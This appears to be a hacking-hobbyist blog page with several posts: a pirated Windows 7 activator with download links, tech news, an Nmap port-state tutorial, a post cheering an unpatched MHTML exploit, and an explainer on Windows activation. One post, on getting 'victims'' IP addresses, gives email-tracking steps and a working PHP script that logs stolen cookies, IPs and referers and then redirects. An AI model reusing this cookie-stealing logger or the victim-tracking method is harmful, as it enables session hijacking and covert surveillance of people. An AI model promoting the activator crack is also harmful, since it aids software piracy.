Microsoft Windows 7 activator - Activate your windows 7

Microsoft Windows  7 activator - Activate your windows 7 

Want to activate your windows 7 using activators? This is the best loader out there that  will help your activate your windows 7 without any fuss.

Procedure :-

1. Download one of the links below 

2. Extract it anywhere 

3. Right-click the Windows Loader and click "Run as Administrator" 

4. Click Install and follow the instructions 

5. After the Windows Loader finish activating your windows click restart.

Download Windows Loader v 2.1.5 **LATEST** Compatible with Windows 7 Service Pack 1 

P.S - Report dead link

• https://www.box.com/s/08b01c01035a5557e841 
• https://safelinking.net/p/07a6fe7024

Continue Reading

Countdown begins Windows XP to die in 1000 days

Countdown begins: Windows XP to die in 1000 days

Finally, the count down begins for Windows XP. The software giant Microsoft said that it will stop support for Windows XP, the world's most popular operating system, after three years.

Microsoft began countdown to the end for Windows X on Monday, Jul 11 and will be end on 1000th day. The company also said that it will not any kind of support to the old operating system. Microsoft is aiming to boost the sale of Windows 7, the latest version.

"Windows XP had an amazing run and millions of PC users are grateful for it. But it’s time to move on," said Stephen Rose, Microsoft’s senior community manager. "Two reasons: 1- Extended support for Windows XP is running out in less than 1,000 days, and 2- there’s an OS out there that’s much better than Windows XP."

The countdown will end on 2014 and there after Windows XP users will nt get any kind of support or patches from Microsoft. If these users want any support, they would have to upgrade to Windows 7.

On April 8, 2014, security patches and hotfixes for all versions of Windows XP will no longer be available. So bottom line, PC’s running Windows XP will be vulnerable to security threats.

"Many third party software providers are not planning to extend support for their applications running on Windows XP, which translates to even more complexity, security risks, and ultimately, added management costs for your IT department if you’re still managing Windows XP environments," Stephen Rose added.

Meanwhile, Microsoft is planning to launch the next generation operating system, Windows 8, in 2012. The company recently demoed the Windows 8 prototype on a tablet computer and a laptop at the D9 Conference. The exciting feature on Windows 8 is its 'touch interface' that features tile-based Start screen

Continue Reading

NMAP TUTORIAL

NMAP(Network Mapper) is one of the most basic & advanced fingerprinting tool.I recommend this tool to everyone.


Basically NMAP is port scanner with advanced features like host identification topology etc

The six port states recognized by Nmap

OPEN

An application is actively accepting TCP connections, UDP datagrams or SCTP associations on this port. Finding these is often the primary goal of port scanning. Security-minded people know that each open port is an avenue for attack. Attackers and pen-testers want to exploit the open ports, while administrators try to close or protect them with firewalls without thwarting legitimate users. Open ports  are also interesting for non-security scans because they show services available for use on the network.

CLOSED

A closed port is accessible (it receives and responds to Nmap probe packets), but there is no application listening on it. They can be helpful in showing that a host is up on an IP address (host discovery, or ping scanning), and as part of OS detection. Because closed ports are reachable, it may be worth scanning later in case some open up. Administrators may want to consider blocking such ports with a firewall. Then they would appear in the filtered state, discussed next.     

FILTERED 

Nmap cannot determine whether the port is open because packet filtering prevents its probes from reaching the port. The filtering could be from a dedicated firewall device, router rules, or host-based firewall software. These ports frustrate attackers because they provide so little information. Sometimes they respond with ICMP error messages such as type 3 code 13 (destination unreachable: communication administratively prohibited), but filters that simply drop probes without responding are far more common. This forces Nmap to retry several times just in case the probe was dropped due to network congestion rather than filtering. This slows down the scan dramatically.

 

UNFILTERED 

The unfiltered state means that a port is accessible, but Nmap is unable to determine whether it is open or closed. Only the ACK scan, which is used to map firewall rulesets, classifies ports into this state. Scanning unfiltered ports with other scan types such as Window scan, SYN scan, or FIN scan, may help resolve whether the port is open.

 

open|filtered

Nmap places ports in this state when it is unable to determine whether a port is open or filtered. This occurs for scan types in which open ports give no response. The lack of response could also mean that a packet filter dropped the probe or any response it elicited. So Nmap does not know for sure whether the port is open or being filtered. The UDP, IP protocol, FIN, NULL, and Xmas scans classify ports this way.

 

closed|filtered

This state is used when Nmap is unable to determine whether a port is closed or filtered. It is only used for the IP ID idle scan.

here are the two videos showing basics of nmap








For those who have low bandwith nd cant go through videos

 Here i used Zenmap(nmap GUI) to scan my windows machine on vmware i used intensive scan with all 65535 ports to scan

 Results were really cool showing all my open ports + os detection was accurate

you can download nmap from here 

do share your views for this tut

Continue Reading

MHTML EXPLOIT LATEST MICROSOFT BUG :P

Latest microsoft MHTML exploit is in fashion for hackers ;)

Microsoft is investigating new public reports of vulnerability in all supported editions of Microsoft Windows. The vulnerability could allow an attacker to cause a victim to run malicious scripts when visiting various Web sites, resulting in information disclosure. This impact is similar to server-side cross-site scripting (XSS) vulnerabilities.

MHTML, or Mime HTML, is a standard that allows web objects such as images to be combined with HTML into a single file. The vulnerability lies in how MHTML interprets Multipurpose Internet Mail Extensions (Mime) for content blocks in a document.

On a Blog post Friday afternoon Google Security Team members said “We’ve noticed some highly targeted and apparently politically motivated attacks against our users. We believe activists may have been a specific target. We’ve also seen attacks against users of another popular social site.”

Now we are finding that Microsoft and Google are working to create a fix on the server side so it can reduce the risk of MHTML Vulnerability, while you can check your machine to determine if you are vulnerable by using the test scenario previously posted by Microsoft.

As a workaround user can also disable ActiveX, but this would affect web applications including banking and e-commerce sites that use ActiveX to provide online services.

 May be a sad news for normal users but :D you know what i mean to say enjoy the exploit guys its not patched yet :P

Continue Reading

W3af – Web Application Attack and Audit Framework

 w3af is a Web Application Attack and Audit Framework. The project's goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend. To read our short and long term objectives, please click over the Project Objectives item in the main menu. This project is currently hosted at SourceForge , for further information, you may also want to visit w3af SourceForge project page .  

 If you are here just to "take a look" please watch the w3af video demos!


A nice tool to check web applications and a good frame work to carry out your tests. It is what Metasploit is for Network Penetration Testing.

 w3af is a Web Application Attack and Audit Framework. The project’s goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend. The w3af core and it’s plugins are fully written in python. The project has more than 130 plugins, which check for SQL injection, cross site scripting (xss), local and remote file inclusion and much more

 This tools lags a bit for windows but as its open source you cant complain :P Although runs smoothly on linux


You can download W3AF here

Continue Reading

HOW TO GET IP ADRESS EASILY

I have been getting requests that the content we are posting is not easy for beginners.I was little disappointed with such review so here we go simple yet effective post about very basic of intenet,networking the IP-address.

What is an IP address?
Every device connected to the public Internet is assigned a unique number known as an Internet Protocol (IP) address. IP addresses consist of four numbers separated by periods (also called a 'dotted-quad') and look something like 112.123.123.121(etc this is example of ipv4)

What can be done with an IP address?

IP adress is the very basic unit before you start a hack its basically used for fingerprinting,tracing and if victim is weak it wont take 10 secs to penetrate through vulnerability :)

HOW can I get an IP address?

Its an easy task to get your aswell as others ip addresses
to get your own ip address just go to this website

How to get ip of a website?

go to shell(command prompt) just type ping www.target.com
and there it will start showing numeric just like in this picture

How to get IP address of friends or victims?

Using E-mail receipts


E-mail receipt is a kind of notification you get as an e-mail when someone open (reading the mail send by you) your mail.


This notification consist of

• IP address of the mail reader.
• Time and date of reading the mail.
• Name and version of his browser.

 You need to follow these steps


a. Step 1:-


Visit readnotify and signup there. You can use your gmail, yahoo, hotmail,rediff or any email id. They give free trials for 2 weeks or 25 emails whichever comes first.


b. Step 2:-


Let's say you have used your email id example@gmail.com to register on readnotify.com, than login to your email account first.


c. Step 3:-


Click on the Compose mail menu and in the To : section write the email id of the culprit followed by readnotify.com, so the complete email address would be like victim@gmail.com.readnotify.com. 
just the normal procedure of email

step 4
you are done just wait for the victim to open that email volla you will get the details.
 

Using php scripts 

here is the basic php script

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('file.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
header ("Location: http://google.com/")
?>

Process:save it in you hosting ripway,my3gb,blackapplehost etc dont forget to create a file.txt file which will save all the ips 

This will save ips with date,time,from where link came+u can redirect to another url just like i redirected to google in matter of seconds.

Upcoming post will be on fingerprinting with ip address so we can work with a flow.

Do share you views on this post i tried to keep it simple.

Continue Reading

How Windows Product Activation Works

How Windows Product Activation Works

Windows Product Activation or WPA is a license validation procedure introduced by Microsoft Corporation in all versions of it’s Windows operating system. WPA was first introduced in Windows XP and continues to exist in Windows Server 2003, Windows Vista, Windows Server 2008 and Windows 7 as well.


WPA enforces each end user to activate their copy of Windows so as to prevent unauthorized usage beyond the specific period of time until it is verified as genuine by Microsoft. How WPA really works was a closely guarded secret until GmbH analyzed WPA using a copy of Windows XP RC1 and published a paper on their findings.

In this post you will find answers to some of the most frequently asked questions about Windows Product Activation.

Why activation?

Microsoft’s intention behind the activation is to limit the usage of it’s Windows operating system to only one machine for which the retail license is issued. Any other computer which runs on the same license must be disallowed from using the software. Thus WPA demands for activation of the product within 30 days of it’s installation so as to ensure that it is genuine.

What does “Genuine Windows” means?

The copy of Windows is said to be genuine only if the product key used during the installation is genuine. It means that a given product key (retail license) must be used to install Windows only on one computer for which the license was purchased. Thus if the same key is used for the installation on another computer, then it is said to be a pirated copy.

Exactly what information is transmitted during the activation?

When you activate your copy of Windows you are transmitting an Installation ID code to the Microsoft either by phone or Internet depending on the method you choose to activate. Based on this, the Microsoft’s licensing system can determine whether or not the installed OS is genuine. If it is said to be genuine, then the system will receive the Activation ID which completes the activation process. If the activation is done via telephone then the Activation ID needs to be entered manually to complete the activation process.

What information does the Installation ID contain?

This Installation ID is a 50-digit number which is derived from the following two data.

1. Product ID – It is actually derived from the 25-digit product key (the alphanumeric value that is printed on the sticker over the Windows CD/DVD case) that is entered during the installation of the operating system. The Product ID is used to uniquely identify your copy of Windows.

2. Hardware ID – This value is derived based on the hardware configuration of your computer.

The WPA system checks the following 10 categories of the computer hardware to derive the Hardware ID:

* Display Adapter
* SCSI Adapter
* IDE Adapter (effectively the motherboard)
* Network Adapter (NIC) and its MAC Address
* RAM Amount Range (i.e., 0-64mb, 64-128mb, etc.)
* Processor Type
* Processor Serial Number
* Hard Drive Device
* Hard Drive Volume Serial Number (VSN)
* CD-ROM / CD-RW / DVD-ROM

Thus the Installation ID which is a combination of Product ID and Hardware ID is finally derived and sent to Microsoft during the activation process.

How is the Installation ID validated?

The Installation ID needs to be validated to confirm the authenticity of the installed copy of Windows. So after the Installation ID is received by Microsoft, it is decoded back so as to obtain the actual product key and the hardware details of the computer involved in the activation process.

The Microsoft’s system will now look to see if this is the first time the product key is being used for the activation. This happens when the user is trying to activate his Windows for the first time after purchase. If this is the case then the Installation ID is validated and the corresponding Activation ID is issued which completes the activation process.

However Microsoft system will now associate this product key with the hardware ID of the computer and stores this information on their servers. In simple words, during the first use of the product key, it is paired together with the Hardware ID and this information is stored up on the Microsoft servers.

What if a computer running a pirated copy of Windows attempts to activate?

The activation fails whenever the copy of Windows installed is not said to be genuine. This usually happens when the product key used for the installation is said to have been used earlier on a different computer. This is determined during the activation process as follows:

During the validation of the Installation ID, the Microsoft’s system checks to see if the same product key was used in any of the previous activation processes. If yes then it looks to see the Hardware ID associated with it. The computer running a pirated copy of Windows will obviously have a different hardware configuration and hence the Hardware ID will mismatch. In this case the activation process will fail.

Thus for a successful activation, either of the following two cases must be satisfied:

1. The product key must have been used for the first time. ie: The product key should not have been used for earlier activations on any other computer.

2. If the product key is said to have been used earlier, then the Hardware ID should match. This happens only if the same computer for which the license was genuinely purchased is attempting for subsequent activation.

What about formatting the hard disk?

Each time the hard disk is reformatted and Windows is re-installed, it needs to be re-activated. However the activation process will be completed smoothly since the same computer is attempting for subsequent activation. In this case both the product key and the Hardware ID will match and hence the activation becomes successful.

What is I upgrade or make changes to my hardware?

In the above mentioned 10 categories of hardware, at least 7 should be the same. Thus you are allowed to make changes to not more than 3 categories of hardware. If you make too many changes then your activation will fail. In this case, it is necessary to contact the customer service representative via phone and explain about your problem. If he is convinced he may re-issue a new product key for your computer using which you can re-activate your Windows.

Some things WPA does not do

* WPA does not send any personal information at all about you to Microsoft. There is still an option to register the product with Microsoft, but that is separate and entirely voluntary.
* If you prefer to activate via phone, you are not required to give any personal information to Microsoft.
* WPA does not provide a means for Microsoft to turn off your machine or damage your data/hardware. (Nor do they even have access to your data). This is a common myth that many people have about Microsoft products.
* WPA is not a “lease” system requiring more payments after two years or any other period. You may use the product as licensed in perpetuity

Continue Reading